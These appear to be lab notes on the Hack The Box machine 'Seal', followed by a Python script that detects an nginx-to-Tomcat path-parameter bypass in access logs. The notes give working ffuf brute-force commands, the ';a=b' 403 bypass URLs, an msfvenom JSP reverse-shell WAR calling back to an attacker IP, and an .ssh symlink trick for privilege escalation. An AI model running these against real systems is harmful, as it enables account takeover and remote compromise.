Hack The Box: Seal

Last updated 3 years ago
  • Register a new account at gitbucket

  • Bruteforce usernames via the registration form (match responses containing "already")

    ffuf -u /register/validate -X POST -d "userName=FUZZ&password=test123&fullName=test&mailAddress=test&extraMailAddresses%5B0%5D=test&extraMailAddresses%5B1%5D=&url=&description=&fileId=" -w ../userlist.txt -mr already -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Valid usernames: alex, root, luis

  • Bruteforce the root password (filter out responses containing "signin")

    ffuf -u /signin -X POST -d "userName=root&password=FUZZ&hash=" -w ../rockyou.txt -fr signin -s -H "Content-Type: application/x-www-form-urlencoded;"

  • Remove mutual authentication, set up registration and login features

  • <user username="tomcat" password="[redacted]" roles="manager-gui,admin-gui"/>

  • Bypass the nginx reverse proxy 403 [nginx -> tomcat]

    https://10.10.10.250/manager;a=b/html/
    https://10.10.10.250/manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=B07EF0732BE104396355D26DD2A56CEE [upload war file]

  • msfvenom --list payloads | grep -ie war

  • msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.76 LPORT=7901 -o shell.war

  • TTY shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Create a soft link: ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/ressurect

  • ansible run.yml: format: zip, mode: 0777

  • If ansible is run by root, create a soft link (ln -s) to the .ssh folder and let it create the zip archive
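Defensive check for the nginx -> tomcat 403 bypass above, added here and not part of the original notes: nginx matches its location block against the raw request path, while Tomcat strips ";param" segments and resolves dot segments before dispatching, so a request can miss the proxy's protected prefix yet still reach the protected servlet. The script assumes nginx's default combined log format and a protected prefix of /manager/html (both assumptions), and flags constructed log lines where the two views disagree.

```python
import re
from urllib.parse import unquote

# Constructed nginx access-log lines for demonstration (not captured from the box).
SAMPLE_LOG = """\
10.10.14.76 - - [07/Jul/2021:10:00:01 +0000] "GET /manager/html HTTP/1.1" 403 153
10.10.14.76 - - [07/Jul/2021:10:00:05 +0000] "GET /manager;a=b/html/ HTTP/1.1" 200 1024
10.10.14.76 - - [07/Jul/2021:10:00:09 +0000] "POST /manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 512
10.10.14.77 - - [07/Jul/2021:10:01:00 +0000] "GET /admin/dashboard/ HTTP/1.1" 200 2048
"""

# Prefixes the nginx config protects (assumed, matching the URLs in the notes).
PROTECTED_PREFIXES = ("/manager/html", "/host-manager/html")

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def tomcat_view(target):
    """Approximate the path Tomcat dispatches on: drop the query string,
    percent-decode, strip ';param' from every segment and resolve '.'/'..'.
    nginx matches its location block on the raw path instead."""
    path = unquote(target.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def find_proxy_bypasses(log_text):
    """Return (ip, raw_path, tomcat_path, status) for requests whose raw path
    misses every protected prefix but whose Tomcat view lands inside one."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        raw = m.group("target").split("?", 1)[0]
        backend = tomcat_view(m.group("target"))
        if backend.startswith(PROTECTED_PREFIXES) and not raw.startswith(PROTECTED_PREFIXES):
            hits.append((m.group("ip"), raw, backend, int(m.group("status"))))
    return hits
```

A 200 on a flagged line means the backend served the protected path even though the proxy rule never matched; fixing the nginx location (or terminating these requests) closes the gap.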

-----------------------------------------------------------------------
Path:
  • bruteforce root login?
  • edit nginx config file to bypass 403
  • bypass nginx
  • upload war file on tomcat manager to gain reverse shell [root flag]
  • how is registration happening at gitbucket

http://10.10.10.250:8080